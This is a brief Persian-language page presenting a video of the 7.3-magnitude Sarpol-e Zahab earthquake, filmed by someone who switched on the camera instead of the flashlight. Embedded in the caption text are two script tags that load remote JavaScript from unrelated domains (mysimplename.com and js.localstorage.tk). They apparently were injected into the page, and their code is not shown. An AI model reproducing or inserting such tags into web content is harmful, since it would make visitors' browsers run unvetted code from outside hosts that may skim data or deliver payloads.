فیلمی اتفاقی از لحظه هولناک زلزله ۷.۳ ریشتری در سرپل ذهاب !!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>در این فیلم فرد وحشت زده بجای چراغ قوه موبایل، دوربین را روشن میکند و فیلم ضبط میشود!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
80

- 
23

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)